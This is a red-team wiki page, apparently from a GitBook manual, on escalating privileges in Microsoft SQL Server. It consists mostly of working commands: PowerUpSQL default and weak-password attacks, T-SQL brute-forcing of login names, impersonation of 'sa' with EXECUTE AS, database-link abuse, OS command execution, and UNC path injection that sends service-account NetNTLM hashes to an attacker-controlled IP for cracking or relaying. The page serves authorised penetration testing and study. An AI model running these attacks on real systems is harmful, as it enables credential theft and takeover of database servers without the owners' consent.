The Red Team Vade Mecum
  • The Red Team Vade Mecum
  • Techniques
    • Defense Evasion
      • Binary Properties and Code Signing
      • ATA/ATP
        • Important Note
        • Intro
        • Lateral Movement
        • Domain Dominance
        • Identification
        • Recon
        • Blocking/Disabling Telemetry
          • Trusted Installer
      • Tips and Tricks
      • Basics
        • IOCs
          • High Level Overview of EDR technologies
        • Sandbox Evasion
        • Obfuscating Imports
          • Bootstrapping
        • Encrypting Strings
      • Disabling/Patching Telemetry
        • ETW Bypasses
        • AMSI Bypasses
      • Minimization
        • Commands to Avoid
        • Pivoting
        • Benefits of Using APIs
        • Thread-less Payload Execution
        • DLL Hollowing
      • Misdirection
        • Command Line Argument Spoofing
        • PPID Spoofing via CreateProcess
        • Switching Parents
          • Dechaining via WMI
      • Hiding our Payloads
        • Event Logs
        • File metadata
        • Registry Keys
        • ADS
      • IPC For Evasion and Control
    • Privilege Escalation
      • Hunting For Passwords
      • To System
        • New Service
        • Named Pipe Impersonation
        • Local Exploits
        • AlwaysInstallElevated
      • Hijacking Execution
        • Environment Variable interception
        • DLL Hijacking
      • Insecure Permissions
        • Missing Services and Tasks
        • Misconfigured Registry Hives
        • Insecure Binary Path
        • Unquoted Service Paths
    • Enumeration
      • Situational Awareness
      • Recon Commands
        • .NET AD Enum commands
        • WMIC commands
          • WMI queries from c++
    • Execution
      • Cool ways of Calling a Process
      • One Liners
    • Initial Access
      • Tips and Tricks
      • Tools
      • Staging/Stagers
      • MS Office
        • Macros
          • Evasion
            • VBA Stomping
            • Revert To Legacy Warning in Excel
            • Sandbox Evasion
          • Info Extraction
          • Inline Shapes
          • .MAM Files
          • PowerPoint
          • ACCDE
          • Shellcode Execution
          • Info Extraction
          • Dechaining Macros
        • Field Abuse
        • DDE
      • Payload Delivery
      • File Formats
        • MSG
        • RTF
        • REG
        • BAT
        • MSI Files
        • IQY
        • CHM
        • LNK
          • Using LNK to Automatically Download Payloads
        • HTA
    • Lateral Movement
      • Linux
        • SSH Hijacking
        • RDP
        • Impacket
      • No Admin?
      • Checking for access
      • Poison Handler
      • WinRM
      • AT
      • PsExec
      • WMI
      • Service Control
      • DCOM
      • RDP
      • SCShell
    • Code Injection
      • Hooking
        • Detours
      • CreateRemoteThread
      • DLL Injection
      • APC Queue Code Injection
      • Early Bird Injection
    • Persistence
      • Scheduled Tasks
        • AT
      • MS Office
      • SQL
      • Admin Level
        • SSP
        • Services
        • Default File Extension
        • AppCert DLLs
        • Time Provider
        • Waitfor
        • WinLogon
        • Netsh Dlls
        • RDP Backdoors
        • AppInit Dlls
        • Port Monitor
        • WMI Event Subscriptions
      • User Level
        • LNK
        • Startup Folder
        • Junction folders
        • Registry Keys
        • Logon Scripts
        • Powershell Profiles
        • Screen Savers
  • Infrastructure
    • SQL
      • MS SQL
        • Basics
        • Finding Sql Servers
        • Privilege Escalation
        • Post Exploitation
  • Other
    • Vulnerability Discovery
      • Web Vulnerabilities
        • Code Grepping
          • PHP Cheatsheet
    • Windows Internals
      • Unorganized Notes
Powered by GitBook
On this page
  • Initial Foothold
  • Default passwords
  • MITM
  • To Sysadmin
  • Blind SQL Login Enumeration
  • Impersonation
  • Database Links
  • UNC Path Injection
  • OS Command Execution

Was this helpful?

  1. Infrastructure
  2. SQL
  3. MS SQL

Privilege Escalation

Initial Foothold

After you find the sql servers in the environment, you should now try to gain initial foothold into those SQL servers. We will try to escalate to a SQL login now.

Default passwords

This command launches a default password test against the SQL server using PowerUpSQL:

>> Get-SQLInstanceDomain | Invoke-SQLAuditDefaultLoginPw
or
>> Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw

Get-SQLInstanceScanUDP | Invoke-SQLAuditWeakLoginPw –> Start the attack from unauthenticated user perspective.
Get-SQLInstanceDomain | Invoke-SQLAuditWeakLoginPw –> Start the attack from domain user perspective.

If you already have a domain set of credentials, this may work on the SQL server. You can test this like so:

>> Get-SQLInstanceScanUDP | Get-SQLConnectionTestThreaded –Username username –Password password (manually)
or
>> Get-SQLInstanceDomain | Get-SQLConnectionTest 
or
>> Get-SQLInstanceLocal | Get-SQLConnectionTest 

MITM

To Sysadmin

After you have gotten initial access to a SQL server.

Blind SQL Login Enumeration

We can begin to list all SQL server logins and try to test weak passwords on those accounts. We can do this with:

SELECT name FROM sys.syslogins
SELECT name FROM sys.server_principals

Note that this only gives a certain subset of sql logins.

To find more sql logins, we can utilize suser_name which returns the principal name for a given principal id. We can find all sql logins by brute forcing the principal ID in the suser_name function.

SELECT SUSER_NAME(1)
SELECT SUSER_NAME(2)
...
SELECT SUSER_NAME(100)
...

We can then being to password spray or brute force these accounts.

This can be automated with PowerUpSQL:

>> Get-SQLFuzzServerLogin –Instance ComputerName\InstanceName

Impersonation

There is a feature in SQL server that allows a less privileged user to impersonate another with more access. For impersonation the queries/commands to be executed are not limited in any way, but for command execution, the database has to be configured as trustworthy.

We cannot enumerate which logins we can impersonate due to our unprivileged nature, but we can check which logins allow impersonation with this:

SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals
b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'

To manually check if you can impersonate a user(SA in our case), issue these commands:

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
EXECUTE AS LOGIN = 'sa' 
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

Database Links

These are a persistent connection between two SQL servers. They allow server A to communicate with server B and pull data from server B, and vice versa without a user being logged in.

Database links can be configured to run as the current user who’s logged in, but some cases they can be configured to run in another users context, and can lead to privilege escalation if ran as another high privileged user like SA.

To query information to a linked server, we can use OpenQuery. Also note that OpenQuery is available to everyone.

To find linked servers, we can use

EXEC sp_linkedservers

and to perform queries on a SQL server

select version from openquery("linkedserver", 'query')

From there, we can perform queries to see the execution context of the user. If it is privileged like SA. we may be able to get sensitive information or get code execution via xp_cmdshell.

UNC Path Injection

If a SQL server grabs a file from a UNC path, The remote file is grabbed under the context of the service account that is running SQL Server. If we can force the user to authenticate to our UNC path, we may be able to capture its NetNTLM hash to either crack or relay it.

If the attack is successful, we will become a DBA or a local admin.

We can use PowerUpSQL and Inveigh for this:

Get-SQLServiceAccountPwHashes -Verbose -TimeOut 20 -CaptureIp attacker_controlled_IP

Or we can setup responder:

sudo responder -I tap0

OS Command Execution

PowerUpSQL

>> $Targets | Invoke-SQLOSCLR -Verbose -Command "Whoami"
>> $Targets | Invoke-SQLOSOle -Verbose -Command "Whoami"
>> $Targets | Invoke-SQLOSR -Verbose -Command "Whoami"

When executing OS commands through SQL Server, those commands are executed in the context of the service account.

PreviousFinding Sql ServersNextPost Exploitation

Last updated 3 years ago

Was this helpful?

If the SQL server communications are unencrypted, we may be able to inject our own queries and inject our own SQL login:

Tools to automate this are:

https://gist.github.com/anonymous/edb02df90942dc4df0e41f3cbb78660b
https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler